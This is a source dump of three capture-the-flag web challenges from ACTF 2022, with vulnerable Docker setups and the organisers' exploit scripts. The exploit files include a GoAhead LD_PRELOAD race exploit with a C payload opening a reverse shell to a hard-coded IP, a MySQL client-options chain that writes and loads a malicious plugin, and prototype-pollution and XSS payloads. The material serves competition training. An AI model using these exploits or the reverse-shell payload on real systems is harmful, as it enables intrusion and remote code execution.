15 | 16 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /web/gogogo/attachments/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.7' 2 | services: 3 | src: 4 | build: ./src/ 5 | tty: true 6 | ports: 7 | - "10218:8081" 8 | ulimits: 9 | nproc: 64 10 | deploy: 11 | resources: 12 | limits: 13 | cpus: '0.50' 14 | memory: 4096M -------------------------------------------------------------------------------- /web/gogogo/attachments/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:buster 2 | 3 | RUN set -ex \ 4 | && apt-get update \ 5 | && apt-get install wget make gcc -y \ 6 | && wget -qO- https://github.com/embedthis/goahead/archive/refs/tags/v5.1.4.tar.gz | tar zx --strip-components 1 -C /usr/src/ \ 7 | && cd /usr/src \ 8 | && make SHOW=1 ME_GOAHEAD_UPLOAD_DIR="'\"/tmp\"'" \ 9 | && make install \ 10 | && cp src/self.key src/self.crt /etc/goahead/ \ 11 | && mkdir -p /var/www/goahead/cgi-bin/ \ 12 | && apt-get purge -y --auto-remove wget make gcc \ 13 | && cd /var/www/goahead \ 14 | && rm -rf /usr/src/ /var/lib/apt/lists/* \ 15 | && sed -e 's!^# route uri=/cgi-bin dir=cgi-bin handler=cgi$!route uri=/cgi-bin dir=/var/www/goahead handler=cgi!' 
-i /etc/goahead/route.txt 16 | 17 | COPY flag /flag 18 | RUN chmod 644 /flag 19 | COPY hello /var/www/goahead/cgi-bin/hello 20 | RUN chmod +x /var/www/goahead/cgi-bin/hello 21 | 22 | RUN groupadd -r ctf && useradd -r -g ctf ctf 23 | EXPOSE 8081 24 | 25 | USER ctf 26 | CMD ["goahead", "-v", "--home", "/etc/goahead", "/var/www/goahead", "0.0.0.0:8081"] -------------------------------------------------------------------------------- /web/gogogo/attachments/src/flag: -------------------------------------------------------------------------------- 1 | ACTF{test_flag} -------------------------------------------------------------------------------- /web/gogogo/attachments/src/hello: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo -e "Content-Type: text/plain\n" 4 | echo -e "Welcome to ACTF!\n" 5 | env -------------------------------------------------------------------------------- /web/gogogo/exploits/exp.py: -------------------------------------------------------------------------------- 1 | import requests, random 2 | from concurrent import futures 3 | from requests_toolbelt import MultipartEncoder 4 | hack_so = open('hack.so','rb').read() 5 | 6 | def upload(url): 7 | m = MultipartEncoder( 8 | fields = { 9 | 'file':('1.txt', hack_so,'application/octet-stream') 10 | } 11 | ) 12 | r = requests.post( 13 | url = url, 14 | data=m, 15 | headers={'Content-Type': m.content_type} 16 | ) 17 | 18 | def include(url): 19 | m = MultipartEncoder( 20 | fields = { 21 | 'LD_PRELOAD': '/proc/self/fd/7', 22 | } 23 | ) 24 | r = requests.post( 25 | url = url, 26 | data=m, 27 | headers={'Content-Type': m.content_type} 28 | ) 29 | 30 | 31 | def race(method): 32 | url = 'http://localhost:10218/cgi-bin/hello' 33 | if method == 'include': 34 | include(url) 35 | else: 36 | upload(url) 37 | 38 | def main(): 39 | task = ['upload','include'] * 1000 40 | random.shuffle(task) # 41 | with futures.ThreadPoolExecutor(max_workers=5) as executor: 
42 | results = list(executor.map(race, task)) 43 | 44 | if __name__ == "__main__": 45 | main() -------------------------------------------------------------------------------- /web/gogogo/exploits/hack.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | __attribute__ ((__constructor__)) void aaanb(void) 6 | { 7 | unsetenv("LD_PRELOAD"); 8 | system("touch /tmp/success"); 9 | system("/bin/bash -c 'bash -i >& /dev/tcp/150.158.58.29/7777 0>&1'"); 10 | } 11 | -------------------------------------------------------------------------------- /web/gogogo/exploits/hack.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/web/gogogo/exploits/hack.so -------------------------------------------------------------------------------- /web/myclient/attachments/check_health.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if curl -i "http://localhost:10047/index.php" 2>&1 | grep "success" ; 3 | then echo "health" 4 | else date && docker-compose down && docker-compose up -d --build &>/dev/null && date 5 | fi 6 | -------------------------------------------------------------------------------- /web/myclient/attachments/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | services: 3 | src: 4 | build: ./src/ 5 | tty: true 6 | ports: 7 | - "10047:80" 8 | restart: on-failure 9 | environment: 10 | MYSQL_USER: 'test' 11 | MYSQL_PASS: 'test123456' 12 | ulimits: 13 | nproc: 64 -------------------------------------------------------------------------------- /web/myclient/attachments/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | 3 | ENV DEBIAN_FRONTEND=noninteractive 4 | 5 | RUN sed -i 
's/security.ubuntu.com/mirrors.tuna.tsinghua.edu.cn/g' /etc/apt/sources.list 6 | RUN sed -i 's/archive.ubuntu.com/mirrors.tuna.tsinghua.edu.cn/g' /etc/apt/sources.list 7 | 8 | RUN apt-get update 9 | RUN apt-get install -y gcc make openssl wget curl vim libbz2-dev libxml2-dev libjpeg-dev libpng-dev libfreetype6-dev libzip-dev libssl-dev libsqlite3-dev libcurl4-openssl-dev libgmp3-dev libonig-dev libreadline-dev libxslt1-dev libffi-dev libmysqlclient-dev pkg-config apache2-dev apache2 mysql-server 10 | 11 | RUN wget https://www.php.net/distributions/php-7.4.28.tar.gz -O /tmp/php-7.4.28.tar.gz 12 | RUN cd /tmp && tar zxvf php-7.4.28.tar.gz 13 | RUN cd /tmp/php-7.4.28 && ./configure --with-apxs2 --with-mysqli=/usr/bin/mysql_config --with-pdo-mysql=/usr/bin/mysql_config && make -j8 && make install 14 | 15 | RUN echo "\nSetHandler application/x-httpd-php\n" >> /etc/apache2/apache2.conf 16 | RUN echo "\nLoadModule php7_module modules/libphp7.so\n" >> /etc/apache2/apache2.conf 17 | RUN a2dismod mpm_event 18 | RUN a2enmod mpm_prefork 19 | COPY ./files/readflag.c / 20 | COPY ./flag / 21 | COPY ./files/start.sh /start.sh 22 | COPY ./files/my.cnf /etc/my.cnf 23 | COPY ./files/index.php /var/www/html/ 24 | 25 | RUN \ 26 | chown root:root /flag && \ 27 | chmod 600 /flag && \ 28 | gcc /readflag.c -o /readflag && \ 29 | chmod +s /readflag && \ 30 | rm /readflag.c 31 | RUN groupmod -g 1337 www-data -o 32 | RUN groupmod -g 1337 mysql -o 33 | EXPOSE 80 34 | ENTRYPOINT ["bash","/start.sh"] 35 | 36 | 37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /web/myclient/attachments/src/files/index.php: -------------------------------------------------------------------------------- 1 | 1500){ 6 | die('too long'); 7 | } 8 | if (is_numeric($key) && is_string($value)) { 9 | mysqli_options($con, $key, $value); 10 | } 11 | mysqli_options($con, MYSQLI_OPT_LOCAL_INFILE, 0); 12 | if (!mysqli_real_connect($con, "127.0.0.1", "test", "test123456", 
"mysql")) { 13 | $content = 'connect failed'; 14 | } else { 15 | $content = 'connect success'; 16 | } 17 | mysqli_close($con); 18 | echo $content; 19 | ?> 20 | -------------------------------------------------------------------------------- /web/myclient/attachments/src/files/my.cnf: -------------------------------------------------------------------------------- 1 | # 2 | # The MySQL database server configuration file. 3 | # 4 | # You can copy this to one of: 5 | # - "/etc/mysql/my.cnf" to set global options, 6 | # - "~/.my.cnf" to set user-specific options. 7 | # 8 | # One can use all long options that the program supports. 9 | # Run program with --help to get a list of available options and with 10 | # --print-defaults to see which it would actually understand and use. 11 | # 12 | # For explanations see 13 | # http://dev.mysql.com/doc/mysql/en/server-system-variables.html 14 | 15 | # 16 | # * IMPORTANT: Additional settings that can override those from this file! 17 | # The files must end with '.cnf', otherwise they'll be ignored. 
18 | #
19 |
20 | !includedir /etc/mysql/conf.d/
21 | !includedir /etc/mysql/mysql.conf.d/
22 | [mysqld]
23 | secure_file_priv = /tmp/e10adc3949ba59abbe56e057f20f883e
--------------------------------------------------------------------------------
/web/myclient/attachments/src/files/readflag.c:
--------------------------------------------------------------------------------
1 | #include /* header name is missing in this listing; fopen, fread, puts and perror are declared in <stdio.h> */
2 |
3 | int main(void) { /* prints the contents of /flag to stdout; the Dockerfile in this dump builds this file and sets chmod +s on the binary */
4 |     char flag[256] = {0};
5 |     FILE* fp = fopen("/flag", "r");
6 |     if (!fp) {
7 |         perror("fopen");
8 |         return 1;
9 |     }
10 |     if (fread(flag, 1, 256, fp) < 0) { /* NOTE(review): fread returns size_t, so "< 0" is never true and a read error goes unreported; ferror(fp) is the check that detects one */
11 |         perror("fread");
12 |         return 1;
13 |     }
14 |     puts(flag); /* NOTE(review): if /flag holds 256 bytes or more, flag has no terminating NUL and puts reads past the array; reading at most sizeof flag - 1 bytes keeps the terminator */
15 |     fclose(fp);
16 |     return 0;
17 | }
--------------------------------------------------------------------------------
/web/myclient/attachments/src/files/start.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | mkdir /tmp/e10adc3949ba59abbe56e057f20f883e  # the directory my.cnf names as secure_file_priv
3 | chmod 1777 /tmp/e10adc3949ba59abbe56e057f20f883e  # world-writable with the sticky bit set
4 | service mysql stop
5 | usermod -d /var/lib/mysql/ mysql
6 | service mysql start
7 |
8 | watch -n 300 'rm -rf /tmp/e10adc3949ba59abbe56e057f20f883e/*' &>/dev/null &  # empties that directory every 300 seconds, in the background
9 | mysql -u root -e "CREATE USER '$MYSQL_USER'@'%' IDENTIFIED BY '$MYSQL_PASS';";  # account name and password come from the environment; '%' accepts the account from any host
10 | mysql -u root -e "GRANT SELECT on mysql.* to '$MYSQL_USER'@'%';FLUSH PRIVILEGES;";
11 | mysql -u root -e "GRANT FILE on *.* to '$MYSQL_USER'@'%';FLUSH PRIVILEGES;";  # FILE is a global privilege: the account can read and write server-side files (LOAD_FILE, SELECT ... INTO OUTFILE / DUMPFILE), confined by secure_file_priv to the directory created above
12 | service apache2 start
13 | tail -f /dev/null  # keeps the container's main process alive
--------------------------------------------------------------------------------
/web/myclient/attachments/src/flag:
--------------------------------------------------------------------------------
1 | AAA{test_flag}
--------------------------------------------------------------------------------
/web/myclient/exploits/exp.py:
--------------------------------------------------------------------------------
1 | import requests, random, string
2 | MYSQLI_INIT_COMMAND = 3
3 | MYSQLI_READ_DEFAULT_FILE = 4
4 | def send(key,
value): 5 | r = requests.get( 6 | url = 'http://localhost:10047/index.php', 7 | params = { 8 | 'key': key, 9 | 'value': value 10 | } 11 | ) 12 | print(value) 13 | print(r.text) 14 | 15 | cnf_payload = b"""[client] 16 | init_command = select sleep(3) 17 | plugin_dir = /tmp/e10adc3949ba59abbe56e057f20f883e/ 18 | default_auth = hack 19 | """.hex() 20 | def rce(): 21 | tmp_dir = '/tmp/e10adc3949ba59abbe56e057f20f883e/' 22 | cnf_name = 'aaa.cnf' 23 | # so_name = 'b1856f.phar' 24 | with open('hack.so','rb') as f: 25 | payload = f.read().hex() 26 | 27 | # upload so 28 | block_size = 1000 29 | for i in range(0,len(payload),block_size): 30 | send(MYSQLI_INIT_COMMAND, f'select 0x{payload[i:i+1000]} into dumpfile "{tmp_dir}tmp{i//1000}.so"') 31 | 32 | s = ','.join([f'(select load_file("{tmp_dir}tmp{x}.so"))' for x in range(len(payload) // block_size + 1)]) 33 | send(MYSQLI_INIT_COMMAND, f'select concat({s}) into dumpfile "{tmp_dir}hack.so"') 34 | # upload cnf 35 | send(MYSQLI_INIT_COMMAND, f'select 0x{cnf_payload} into dumpfile "{tmp_dir}{cnf_name}"') 36 | print(f'{tmp_dir}{cnf_name}') 37 | # send(MYSQLI_INIT_COMMAND, 'select sleep(5)') 38 | send(MYSQLI_READ_DEFAULT_FILE, f'{tmp_dir}{cnf_name}') 39 | """ 40 | apt install sudo 41 | mysql --defaults-file=aaa.cnf -u test -p 42 | """ 43 | 44 | if __name__ == "__main__": 45 | rce() -------------------------------------------------------------------------------- /web/myclient/exploits/hack.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/web/myclient/exploits/hack.so -------------------------------------------------------------------------------- /web/poorui/attachments/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.7' 2 | services: 3 | src: 4 | build: ./src/ 5 | tty: true 6 | restart: on-failure 7 | ports: 8 | - "8081:8081" 
-------------------------------------------------------------------------------- /web/poorui/attachments/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:16 2 | 3 | COPY ./source /app 4 | WORKDIR /app 5 | RUN npm install && npm install pm2 -g 6 | RUN sed -i "s@http://deb.debian.org@http://mirrors.aliyun.com@g" /etc/apt/sources.list && rm -Rf /var/lib/apt/lists/* 7 | RUN apt-get update && apt-get install -y libnss3 libnspr4 libatk1.0-0 libatk-bridge2.0-0 libcups2 libdrm2 libxkbcommon0 libxcomposite1 libxdamage1 libxfixes3 libxrandr2 libgbm1 libasound2 8 | 9 | ENV FLAG="ACTF{**********}" LISTEN="0.0.0.0" 10 | 11 | CMD ["/bin/bash", "./start.sh"] -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/adminbot.js: -------------------------------------------------------------------------------- 1 | import puppeteer from "puppeteer"; 2 | 3 | const SERVER_URL = 'http://localhost:8081/chat'; 4 | const USERNAME = 'admin'; 5 | 6 | (async () => { 7 | const browser = await puppeteer.launch({ 8 | headless: process.env.DEBUG ?? true 9 | }); 10 | const page = await browser.newPage() 11 | await page.goto(SERVER_URL) 12 | await page.type('#username', USERNAME) 13 | await page.click('#btn-login') 14 | page.on('load', () => { 15 | console.log(page.url()) 16 | if(page.url() !== SERVER_URL){ 17 | setTimeout(async () => { 18 | await page.goto(SERVER_URL) 19 | await page.type('#username', USERNAME) 20 | await page.click('#btn-login') 21 | }, 3000); 22 | } 23 | }) 24 | })(); -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/config.js: -------------------------------------------------------------------------------- 1 | export const FLAG = process.env.FLAG ?? 
'flag{this_is_a_flag}' 2 | export const WS_SERVER = 'ws://127.0.0.1:8081' 3 | export const PORT = 8081 4 | /* Bind address; falls back to 'localhost' only when LISTEN is unset (the Dockerfile in this listing sets it to 0.0.0.0). */ export const LISTEN = process.env.LISTEN ?? 'localhost' -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/flagbot.js: -------------------------------------------------------------------------------- 1 | /* flagbot: WebSocket client that logs in as 'flagbot' when the server sends a "login" message and answers "getflag" requests with FLAG. */ import WebSocket from "ws"; 2 | import { FLAG, WS_SERVER } from "./config.js"; 3 | import { isJson } from "./util.js"; 4 | 5 | const conn = new WebSocket(WS_SERVER) 6 | const username = 'flagbot' 7 | 8 | /* Sends a login request carrying only the fixed username; no credential accompanies it. */ const handleLogin = () => { 9 | conn.send(JSON.stringify({ 10 | api: "login", 11 | username: username 12 | })) 13 | } 14 | 15 | /* Sends FLAG back to the requester, but only when the requester name is exactly 'admin'. NOTE(review): from is the from field of the incoming message (see handleMsg), so this check is only as strong as the server's guarantee that no other client can obtain or claim the name 'admin'. server.js is not shown here; confirm it binds from to an authenticated session rather than a self-chosen username (the author's readme notes that admin login should have been restricted). */ const handleGetFlag = (from) => { 16 | console.log('[getflag]', from) 17 | if(from === 'admin'){ 18 | conn.send(JSON.stringify({ 19 | api: 'sendflag', 20 | flag: FLAG, 21 | to: from 22 | })) 23 | } 24 | } 25 | 26 | /* Logs the peer list received from the server; nothing else is done with it. */ const handleList = (list) => { 27 | console.log(list) 28 | } 29 | 30 | /* Dispatches one parsed message on its api field; "getflag" is ignored when from is missing or falsy, and unknown api values are only logged. */ const handleMsg = (msg) => { 31 | switch(msg.api){ 32 | case "login": 33 | handleLogin() 34 | break 35 | case "list": 36 | handleList(msg.peers) 37 | break 38 | case "getflag": 39 | if(msg.from) handleGetFlag(msg.from) 40 | break 41 | default: 42 | console.log("unknown api", msg.api) 43 | } 44 | } 45 | 46 | /* On connect: send a ping, then ask for the peer list. */ conn.onopen = () => { 47 | const msg = { 48 | api: "ping", 49 | data: "hello world" 50 | } 51 | conn.send(JSON.stringify(msg)) 52 | conn.send(JSON.stringify({api: "list"})) 53 | } 54 | 55 | /* Logs every raw frame, then handles it only if isJson accepts it; the frame is parsed twice, once inside isJson and once here. */ conn.on('message', msg => { 56 | console.log('[onmessage]', msg.toString()) 57 | if(isJson(msg)){ 58 | handleMsg(JSON.parse(msg)) 59 | } 60 | }) -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "type": "module", 3 | "dependencies": { 4 | "body-parser": "^1.20.0", 5 | "express": "^4.18.1", 6 | "puppeteer": "^14.4.1", 7 | "uuid":
"^8.3.2", 8 | "ws": "^8.5.0" 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/asset-manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "files": { 3 | "main.css": "/static/css/main.c7f24255.css", 4 | "main.js": "/static/js/main.6e3bc586.js", 5 | "index.html": "/index.html", 6 | "main.c7f24255.css.map": "/static/css/main.c7f24255.css.map", 7 | "main.6e3bc586.js.map": "/static/js/main.6e3bc586.js.map" 8 | }, 9 | "entrypoints": [ 10 | "static/css/main.c7f24255.css", 11 | "static/js/main.6e3bc586.js" 12 | ] 13 | } -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/web/poorui/attachments/src/source/public/favicon.ico -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/index.html: -------------------------------------------------------------------------------- 1 | React App
-------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/logo192.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/web/poorui/attachments/src/source/public/logo192.png -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/logo512.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/web/poorui/attachments/src/source/public/logo512.png -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "short_name": "React App", 3 | "name": "Create React App Sample", 4 | "icons": [ 5 | { 6 | "src": "favicon.ico", 7 | "sizes": "64x64 32x32 24x24 16x16", 8 | "type": "image/x-icon" 9 | }, 10 | { 11 | "src": "logo192.png", 12 | "type": "image/png", 13 | "sizes": "192x192" 14 | }, 15 | { 16 | "src": "logo512.png", 17 | "type": "image/png", 18 | "sizes": "512x512" 19 | } 20 | ], 21 | "start_url": ".", 22 | "display": "standalone", 23 | "theme_color": "#000000", 24 | "background_color": "#ffffff" 25 | } 26 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/robots.txt: -------------------------------------------------------------------------------- 1 | # https://www.robotstxt.org/robotstxt.html 2 | User-agent: * 3 | Disallow: 4 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/static/css/main.66b2f292.css: -------------------------------------------------------------------------------- 1 
| body{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,sans-serif;margin:0}code{font-family:source-code-pro,Menlo,Monaco,Consolas,Courier New,monospace}.App{text-align:center}.App-logo{height:40vmin;pointer-events:none}@media (prefers-reduced-motion:no-preference){.App-logo{-webkit-animation:App-logo-spin 20s linear infinite;animation:App-logo-spin 20s linear infinite}}.App-header{align-items:center;background-color:#282c34;color:#fff;display:flex;flex-direction:column;font-size:calc(10px + 2vmin);justify-content:center;min-height:100vh}.App-link{color:#61dafb}@-webkit-keyframes App-logo-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@keyframes App-logo-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}.msg-list{background-color:silver;margin:10px auto;padding:10px;width:50%}.msg-item{margin:20px auto;width:60%}.msg-card{background-color:#faebd7;border:5px;border-radius:5px;padding:5px}.from{background-color:aqua;margin:0;text-align:left}.content,.from{padding:5px 10px}.content{background-color:#7fffd4}.text{padding:5px;text-align:left}.warning-text{background-color:#f44336;padding:10px} -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/static/css/main.c7f24255.css: -------------------------------------------------------------------------------- 1 | body{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,sans-serif;margin:0}code{font-family:source-code-pro,Menlo,Monaco,Consolas,Courier New,monospace}.App{text-align:center}.App-logo{height:40vmin;pointer-events:none}@media 
(prefers-reduced-motion:no-preference){.App-logo{-webkit-animation:App-logo-spin 20s linear infinite;animation:App-logo-spin 20s linear infinite}}.App-header{align-items:center;background-color:#282c34;color:#fff;display:flex;flex-direction:column;font-size:calc(10px + 2vmin);justify-content:center;min-height:100vh}.App-link{color:#61dafb}@-webkit-keyframes App-logo-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}@keyframes App-logo-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}.msg-list{background-color:silver;margin:10px auto;padding:10px;width:50%}.msg-item{margin:20px auto;width:60%}.msg-card{background-color:#faebd7;border:5px;border-radius:5px;padding:5px}.from{background-color:aqua;margin:0;text-align:left}.content,.from{padding:5px 10px}.content{background-color:#7fffd4}.text{padding:5px;text-align:left}.warning-text{background-color:#f44336;padding:10px} 2 | /*# sourceMappingURL=main.c7f24255.css.map*/ -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/static/js/main.001408dd.js.LICENSE.txt: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Lodash 4 | * Copyright JS Foundation and other contributors 5 | * Released under MIT license 6 | * Based on Underscore.js 1.8.3 7 | * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors 8 | */ 9 | 10 | /** 11 | * @license React 12 | * react-dom.production.min.js 13 | * 14 | * Copyright (c) Facebook, Inc. and its affiliates. 15 | * 16 | * This source code is licensed under the MIT license found in the 17 | * LICENSE file in the root directory of this source tree. 18 | */ 19 | 20 | /** 21 | * @license React 22 | * react-jsx-runtime.production.min.js 23 | * 24 | * Copyright (c) Facebook, Inc. and its affiliates. 
25 | * 26 | * This source code is licensed under the MIT license found in the 27 | * LICENSE file in the root directory of this source tree. 28 | */ 29 | 30 | /** 31 | * @license React 32 | * react.production.min.js 33 | * 34 | * Copyright (c) Facebook, Inc. and its affiliates. 35 | * 36 | * This source code is licensed under the MIT license found in the 37 | * LICENSE file in the root directory of this source tree. 38 | */ 39 | 40 | /** 41 | * @license React 42 | * scheduler.production.min.js 43 | * 44 | * Copyright (c) Facebook, Inc. and its affiliates. 45 | * 46 | * This source code is licensed under the MIT license found in the 47 | * LICENSE file in the root directory of this source tree. 48 | */ 49 | 50 | /** 51 | * React Router v6.3.0 52 | * 53 | * Copyright (c) Remix Software Inc. 54 | * 55 | * This source code is licensed under the MIT license found in the 56 | * LICENSE.md file in the root directory of this source tree. 57 | * 58 | * @license MIT 59 | */ 60 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/static/js/main.11c0ee5f.js.LICENSE.txt: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Lodash 4 | * Copyright JS Foundation and other contributors 5 | * Released under MIT license 6 | * Based on Underscore.js 1.8.3 7 | * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors 8 | */ 9 | 10 | /** 11 | * @license React 12 | * react-dom.production.min.js 13 | * 14 | * Copyright (c) Facebook, Inc. and its affiliates. 15 | * 16 | * This source code is licensed under the MIT license found in the 17 | * LICENSE file in the root directory of this source tree. 18 | */ 19 | 20 | /** 21 | * @license React 22 | * react-jsx-runtime.production.min.js 23 | * 24 | * Copyright (c) Facebook, Inc. and its affiliates. 
25 | * 26 | * This source code is licensed under the MIT license found in the 27 | * LICENSE file in the root directory of this source tree. 28 | */ 29 | 30 | /** 31 | * @license React 32 | * react.production.min.js 33 | * 34 | * Copyright (c) Facebook, Inc. and its affiliates. 35 | * 36 | * This source code is licensed under the MIT license found in the 37 | * LICENSE file in the root directory of this source tree. 38 | */ 39 | 40 | /** 41 | * @license React 42 | * scheduler.production.min.js 43 | * 44 | * Copyright (c) Facebook, Inc. and its affiliates. 45 | * 46 | * This source code is licensed under the MIT license found in the 47 | * LICENSE file in the root directory of this source tree. 48 | */ 49 | 50 | /** 51 | * React Router v6.3.0 52 | * 53 | * Copyright (c) Remix Software Inc. 54 | * 55 | * This source code is licensed under the MIT license found in the 56 | * LICENSE.md file in the root directory of this source tree. 57 | * 58 | * @license MIT 59 | */ 60 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/public/test.html: -------------------------------------------------------------------------------- 1 | 2 | 3 |
wow
4 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | pm2 start server.js 4 | pm2 start adminbot.js 5 | pm2 start flagbot.js 6 | tail -f /dev/null -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/tpls/test.tpl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |
5 |

hello, {{username}}

6 |
7 |

How to use this template?

8 |

Just type a json in the sendbox like following:

9 |
10 | 11 | { "username": "admin" } 12 | 13 |
14 | 15 | -------------------------------------------------------------------------------- /web/poorui/attachments/src/source/util.js: -------------------------------------------------------------------------------- 1 | /* Returns true when s parses as JSON and the parsed value is an Object instance (plain objects and arrays); returns false for JSON primitives, null, and anything that fails to parse (the parse error is swallowed). It only reports the result, so callers parse s a second time. NOTE(review): no key names are rejected; JSON.parse keeps a "__proto__" key as an ordinary own property, which matters if the parsed object is later handed to a recursive merge, so validate keys where the object is consumed. */ export const isJson = (s) => { 2 | try{ 3 | if(JSON.parse(s) instanceof Object){ 4 | return true 5 | } 6 | }catch(e){ 7 | // console.log(e) 8 | } 9 | return false 10 | } -------------------------------------------------------------------------------- /web/poorui/exploits/readme.md: -------------------------------------------------------------------------------- 1 | # Chatting 2 | 3 | ~~直接admin登陆getflag~~ 4 | 5 | (唉应该加个限制admin登陆ip的) 6 | 7 | expected exploit approach 8 | 1. lodash prototype pollution 9 | 2. image xss (many ways) 10 | 3. make the admin refresh the browser page and goto a third party site which would connect to the websocket server as a client 11 | 4. login as admin, getflag and send it to your favorite `nc -lvp 1337` 12 | 13 | ### Details 14 | 15 | prototype pollution payload: 16 | ```js 17 | content: { 18 | type: 'tpl', 19 | data: { 20 | tpl: '

{{b}}

', 21 | ctx: '{"a":123, "b":123, "__proto__":{"allowImage":true}}' 22 | } 23 | } 24 | ``` 25 | 26 | xss payload: 27 | ```js 28 | content: { 29 | type: 'image', 30 | data: { 31 | src: 'https://i.picsum.photos/id/220/200/200.jpg?hmac=1eed0JUIOlpc-iGslem_jB1FORVXUdRtOmgpHxDDKZQ', 32 | attrs: { 33 | wow: 1, 34 | dangerouslySetInnerHTML: { 35 | __html: "" 36 | } 37 | } 38 | } 39 | } 40 | ``` 41 | --------------------------------------------------------------------------------